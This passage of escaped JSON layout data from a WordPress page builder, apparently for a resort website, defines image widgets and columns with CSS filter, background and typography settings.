px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"4a4a9e2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/IMG_4252.jpg\",\"id\":172},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"774d3f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8258c6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9aa1d2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"21f8b67\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"1292ee5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/2008-088.jpg\",\"id\":105},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"37d43aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"78ff838\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f89e7a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38c4cb9\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"6ea5dc9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3480.jpg\",\"id\":355},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brig